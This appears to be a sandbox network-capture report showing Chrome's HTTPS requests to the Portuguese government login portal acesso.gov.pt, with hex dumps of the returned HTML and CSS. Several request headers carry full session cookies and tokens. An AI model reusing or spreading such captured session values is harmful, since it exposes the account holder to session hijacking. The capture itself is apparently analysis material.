                                                                                                                  2024-11-14 13:59:51 UTC12377INData Raw: 33 30 35 31 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d
                                                                                                                  Data Ascii: 3051<!DOCTYPE html><html><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0"> <meta http-equiv="X-UA-Compatible" content=
                                                                                                                  2024-11-14 13:59:51 UTC2671INData Raw: 61 36 38 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 20 68 72 65 66 3d 22 2f 61 6c 74 65 72 61 72 44 61 64 6f 73 41 63 65 73 73 6f 46 6f 72 6d 3f 70 61 72 74 49 44 3d 50 46 41 50 26 70 61 74 68 3d 26 23 78 32 66 3b 67 65 72 61 6c 26 23 78 32 66 3b 64 61 73 68 62 6f 61 72 64 26 61 75 74 68 4d 65 74 68 6f 64 73 3d 4e 49 46 2c 45 4f 52 49 2c 43 41 52 54 41 4f 5f 44 45 5f 43 49 44 41 44 41 4f 22 20 74 69 74 6c 65 3d 22 41 6c 74 65 72 61 72 20 44 61 64 6f 73 20 64 65 20 41 63 65 73 73 6f 22 3e 41 6c 74 65 72 61 72 20 44 61 64 6f 73 20 64 65 20 41 63 65 73 73 6f 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: a68 <a href="/alterarDadosAcessoForm?partID=PFAP&path=&#x2f;geral&#x2f;dashboard&authMethods=NIF,EORI,CARTAO_DE_CIDADAO" title="Alterar Dados de Acesso">Alterar Dados de Acesso</a> </li> <li>
                                                                                                                  2024-11-14 13:59:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.44973762.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:52 UTC1141OUTGET /autentica_static/css/styles.css?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: text/css,*/*;q=0.1
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: style
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
                                                                                                                  2024-11-14 13:59:52 UTC363INHTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:01:50 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: text/css
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:52 GMT
                                                                                                                  Age: 0
                                                                                                                  Content-Length: 52750
                                                                                                                  2024-11-14 13:59:52 UTC16021INData Raw: 0a 2e 6d 61 69 6e 2d 68 65 61 64 65 72 2d 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 66 66 66 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 73 6f 6c 69 64 20 31 70 78 20 23 65 63 65 63 65 63 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 20 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7a 2d 69 6e 64 65 78 3a 31 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 70 78 20 33 70 78 20 35 70 78 20 30 70 78 20 72 67 62 61 28 35 30 2c 20 35 30 2c 20 35 30 2c 20 30 2e 33 35 29 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 70 78 20 33 70 78 20 35 70 78 20 30 70 78 20 72 67 62 61 28 35 30 2c 20 35 30 2c 20 35 30 2c 20 30 2e 33 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 70 78 20 33 70 78 20 35 70 78 20 30 70 78 20 72 67
                                                                                                                  Data Ascii: .main-header-body{background:#ffffff;border-bottom:solid 1px #ececec;padding:15px 0;position:relative;z-index:1;-webkit-box-shadow:0px 3px 5px 0px rgba(50, 50, 50, 0.35);-moz-box-shadow:0px 3px 5px 0px rgba(50, 50, 50, 0.35);box-shadow:0px 3px 5px 0px rg
                                                                                                                  2024-11-14 13:59:52 UTC16384INData Raw: 3a 22 5c 66 31 33 31 22 3b 7d 0a 2e 66 61 2d 73 68 69 65 6c 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 33 32 22 3b 7d 0a 2e 66 61 2d 63 61 6c 65 6e 64 61 72 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 33 33 22 3b 7d 0a 2e 66 61 2d 66 69 72 65 2d 65 78 74 69 6e 67 75 69 73 68 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 33 34 22 3b 7d 0a 2e 66 61 2d 72 6f 63 6b 65 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 33 35 22 3b 7d 0a 2e 66 61 2d 6d 61 78 63 64 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 33 36 22 3b 7d 0a 2e 66 61 2d 63 68 65 76 72 6f 6e 2d 63 69 72 63 6c 65 2d 6c 65 66 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 33 37 22 3b 7d 0a
                                                                                                                  Data Ascii: :"\f131";}.fa-shield:before{content:"\f132";}.fa-calendar-o:before{content:"\f133";}.fa-fire-extinguisher:before{content:"\f134";}.fa-rocket:before{content:"\f135";}.fa-maxcdn:before{content:"\f136";}.fa-chevron-circle-left:before{content:"\f137";}
                                                                                                                  2024-11-14 13:59:52 UTC363INData Raw: 72 3a 23 33 33 33 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 45 33 45 33 45 33 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 31 34 70 78 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 34 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 7d 2e 74 65 78 74 2d 69 6e 70 75 74 20 69 6e 70 75 74 2e 65 72 72 6f 72 2c 2e 74 65 78 74 61 72 65 61 2d 69 6e 70 75 74 20 69 6e 70 75 74 2e 65 72 72 6f 72 2c 2e 74 65 78 74 2d 69 6e 70 75 74 20 74 65 78 74 61 72 65 61 2e 65 72 72 6f 72 2c 2e 74 65 78 74 61 72 65 61 2d 69 6e 70 75 74 20 74 65 78 74 61 72 65 61 2e 65 72 72 6f 72 2c 2e 74 65 78 74 2d 69 6e 70 75 74 20 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2e 65 72 72
                                                                                                                  Data Ascii: r:#333;border:1px solid #E3E3E3;padding:10px 14px;width:100%;height:40px;background-color:#ffffff;border-radius:5px;}.text-input input.error,.textarea-input input.error,.text-input textarea.error,.textarea-input textarea.error,.text-input .input-group.err
                                                                                                                  2024-11-14 13:59:53 UTC16384INData Raw: 6e 70 75 74 2c 2e 74 65 78 74 2d 69 6e 70 75 74 2e 66 6f 63 75 73 20 74 65 78 74 61 72 65 61 2c 2e 74 65 78 74 61 72 65 61 2d 69 6e 70 75 74 2e 66 6f 63 75 73 20 74 65 78 74 61 72 65 61 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 30 38 34 63 63 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 31 30 70 78 20 23 39 65 63 61 65 64 3b 7d 0a 2e 74 65 78 74 2d 69 6e 70 75 74 20 3a 3a 2d 77 65 62 6b 69 74 2d 69 6e 70 75 74 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2c 2e 74 65 78 74 61 72 65 61 2d 69 6e 70 75 74 20 3a 3a 2d 77 65 62 6b 69 74 2d 69 6e 70 75 74 2d 70 6c 61 63 65 68 6f 6c 64 65 72 7b 63 6f 6c 6f 72 3a 23 39 42 39 42 39 42 3b 7d 0a 2e 74 65 78 74 2d 69 6e 70 75 74 20 3a 2d 6d 6f 7a 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2c 2e 74 65 78 74 61 72 65 61 2d 69
                                                                                                                  Data Ascii: nput,.text-input.focus textarea,.textarea-input.focus textarea{border-color:#0084cc;box-shadow:0 0 10px #9ecaed;}.text-input ::-webkit-input-placeholder,.textarea-input ::-webkit-input-placeholder{color:#9B9B9B;}.text-input :-moz-placeholder,.textarea-i
                                                                                                                  2024-11-14 13:59:53 UTC3598INData Raw: 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 31 32 31 30 70 78 29 7b 2e 67 72 69 64 7b 6d 61 72 67 69 6e 3a 30 20 32 30 70 78 3b 7d 20 2e 6d 75 6c 74 69 70 6c 65 2d 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 2d 73 65 63 74 69 6f 6e 20 2e 69 6e 66 6f 2d 70 61 6e 65 6c 2c 2e 6d 75 6c 74 69 70 6c 65 2d 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 2d 73 65 63 74 69 6f 6e 20 2e 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 2d 70 61 6e 65 6c 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 30 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 30 70 78 3b 6d 61 78 2d 77 69 64 74 68 3a 35 32 30 70 78 3b 7d 20 2e 6d 75 6c 74 69 70 6c 65 2d 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 2d 73 65 63 74 69 6f 6e 20 2e 72 69 67 68 74 2d 66 69 78 65 64 2d 70 61 6e 65 6c 7b 6d 61 72
                                                                                                                  Data Ascii: n and (max-width:1210px){.grid{margin:0 20px;} .multiple-authentication-section .info-panel,.multiple-authentication-section .authentication-panel{padding-left:10px;margin-left:10px;max-width:520px;} .multiple-authentication-section .right-fixed-panel{mar


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  3192.168.2.44974162.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:52 UTC1144OUTGET /autentica_static/css/sa-custom.css?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: text/css,*/*;q=0.1
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: style
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
                                                                                                                  2024-11-14 13:59:53 UTC363INHTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: text/css
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:52 GMT
                                                                                                                  Age: 0
                                                                                                                  Content-Length: 1347
                                                                                                                  2024-11-14 13:59:53 UTC1347INData Raw: 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 73 61 5f 63 75 73 74 6f 6d 5f 63 61 70 73 27 3b 0d 0a 20 20 73 72 63 3a 20 20 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 73 61 5f 63 75 73 74 6f 6d 5f 63 61 70 73 2e 65 6f 74 3f 73 33 31 78 66 30 27 29 3b 0d 0a 20 20 73 72 63 3a 20 20 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 73 61 5f 63 75 73 74 6f 6d 5f 63 61 70 73 2e 65 6f 74 3f 73 33 31 78 66 30 23 69 65 66 69 78 27 29 20 66 6f 72 6d 61 74 28 27 65 6d 62 65 64 64 65 64 2d 6f 70 65 6e 74 79 70 65 27 29 2c 0d 0a 20 20 20 20 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 73 61 5f 63 75 73 74 6f 6d 5f 63 61 70 73 2e 74 74 66 3f 73 33 31 78 66 30 27 29 20 66 6f 72 6d 61 74 28 27 74 72 75 65 74 79 70 65 27 29 2c 0d 0a 20 20
                                                                                                                  Data Ascii: @font-face { font-family: 'sa_custom_caps'; src: url('../fonts/sa_custom_caps.eot?s31xf0'); src: url('../fonts/sa_custom_caps.eot?s31xf0#iefix') format('embedded-opentype'), url('../fonts/sa_custom_caps.ttf?s31xf0') format('truetype'),


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  4192.168.2.44973862.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:52 UTC1139OUTGET /autentica_static/css/tabs.css?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: text/css,*/*;q=0.1
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: style
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
                                                                                                                  2024-11-14 13:59:52 UTC394INHTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:01:50 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Keep-Alive: timeout=2, max=48
                                                                                                                  Content-Type: text/css
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:52 GMT
                                                                                                                  Age: 0
                                                                                                                  Content-Length: 2107
                                                                                                                  2024-11-14 13:59:52 UTC2107INData Raw: 2e 73 69 64 65 2d 70 61 6e 65 6c 2c 2e 74 61 62 73 7b 6d 61 78 2d 77 69 64 74 68 3a 39 30 25 3b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 37 35 70 78 20 61 75 74 6f 3b 7d 0a 2e 73 69 64 65 2d 70 61 6e 65 6c 3a 61 66 74 65 72 2c 2e 74 61 62 73 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 27 27 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 7d 0a 2e 74 61 62 73 20 69 6e 70 75 74 5b 74 79 70 65 3d 72 61 64 69 6f 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 0a 2e 74 61 62 2d 6c 61 62 65 6c 20 73 70 61 6e 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23
                                                                                                                  Data Ascii: .side-panel,.tabs{max-width:90%;float:none;list-style:none;padding:0;margin:75px auto;}.side-panel:after,.tabs:after{content:'';display:table;clear:both;}.tabs input[type=radio]{display:none;}.tab-label span{font-weight:700;text-decoration:none;color:#


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  5192.168.2.44974062.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:52 UTC1145OUTGET /autentica_static/pf/css/pf-main.css?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: text/css,*/*;q=0.1
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: style
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
                                                                                                                  2024-11-14 13:59:52 UTC363INHTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: text/css
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:52 GMT
                                                                                                                  Age: 0
                                                                                                                  Content-Length: 217455
                                                                                                                  2024-11-14 13:59:52 UTC16021INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0d 0a 2e 66 6f 6e 74 2d 73 6d 6f 6f 74 68 20 7b 0d 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 61 6e 74 69 61 6c 69 61 73 65 64 3b 0d 0a 7d 0d 0a 2e 6f 70 74 69 6d 69 7a 65 4c 65 67 69 62 69 6c 69 74 79 20 7b 0d 0a 20 20 20 20 74 65 78 74 2d 72 65 6e 64 65 72 69 6e 67 3a 20 6f 70 74 69 6d 69 7a 65 4c 65 67 69 62 69 6c 69 74 79 3b 0d 0a 7d 0d 0a 2e 68 69 64 64 65 6e 4f 6e 4f 66 66 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0d 0a 7d 0d 0a 2e 68 69 64 65 2d 74 65 78 74 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 3a 20 30 2f 30 20 73 65 72 69 66 3b 0d 0a 20 20 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72
                                                                                                                  Data Ascii: @charset "UTF-8";.font-smooth { -webkit-font-smoothing: antialiased;}.optimizeLegibility { text-rendering: optimizeLegibility;}.hiddenOnOff { display: none;}.hide-text { font: 0/0 serif; text-shadow: none; color
                                                                                                                  2024-11-14 13:59:52 UTC16384INData Raw: 65 74 2d 31 30 20 7b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 38 33 2e 33 33 33 33 33 33 33 33 25 3b 0d 0a 7d 0d 0a 2e 63 6f 6c 2d 78 73 2d 6f 66 66 73 65 74 2d 39 20 7b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 37 35 25 3b 0d 0a 7d 0d 0a 2e 63 6f 6c 2d 78 73 2d 6f 66 66 73 65 74 2d 38 20 7b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 36 36 2e 36 36 36 36 36 36 36 37 25 3b 0d 0a 7d 0d 0a 2e 63 6f 6c 2d 78 73 2d 6f 66 66 73 65 74 2d 37 20 7b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 35 38 2e 33 33 33 33 33 33 33 33 25 3b 0d 0a 7d 0d 0a 2e 63 6f 6c 2d 78 73 2d 6f 66 66 73 65 74 2d 36 20 7b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 35 30 25 3b 0d 0a 7d 0d 0a 2e 63 6f 6c 2d 78 73 2d 6f
                                                                                                                  Data Ascii: et-10 { margin-left: 83.33333333%;}.col-xs-offset-9 { margin-left: 75%;}.col-xs-offset-8 { margin-left: 66.66666667%;}.col-xs-offset-7 { margin-left: 58.33333333%;}.col-xs-offset-6 { margin-left: 50%;}.col-xs-o
                                                                                                                  2024-11-14 13:59:52 UTC363INData Raw: 20 20 20 20 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 20 3e 20 2e 74 61 62 6c 65 2d 62 6f 72 64 65 72 65 64 20 3e 20 74 66 6f 6f 74 20 3e 20 74 72 20 3e 20 74 68 3a 66 69 72 73 74 2d 63 68 69 6c 64 2c 0d 0a 20 20 20 20 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 20 3e 20 2e 74 61 62 6c 65 2d 62 6f 72 64 65 72 65 64 20 3e 20 74 68 65 61 64 20 3e 20 74 72 20 3e 20 74 64 3a 66 69 72 73 74 2d 63 68 69 6c 64 2c 0d 0a 20 20 20 20 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 20 3e 20 2e 74 61 62 6c 65 2d 62 6f 72 64 65 72 65 64 20 3e 20 74 62 6f 64 79 20 3e 20 74 72 20 3e 20 74 64 3a 66 69 72 73 74 2d 63 68 69 6c 64 2c 0d 0a 20 20 20 20 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 20 3e 20 2e 74 61 62 6c 65 2d 62 6f 72 64 65 72 65 64
                                                                                                                  Data Ascii: .table-responsive > .table-bordered > tfoot > tr > th:first-child, .table-responsive > .table-bordered > thead > tr > td:first-child, .table-responsive > .table-bordered > tbody > tr > td:first-child, .table-responsive > .table-bordered
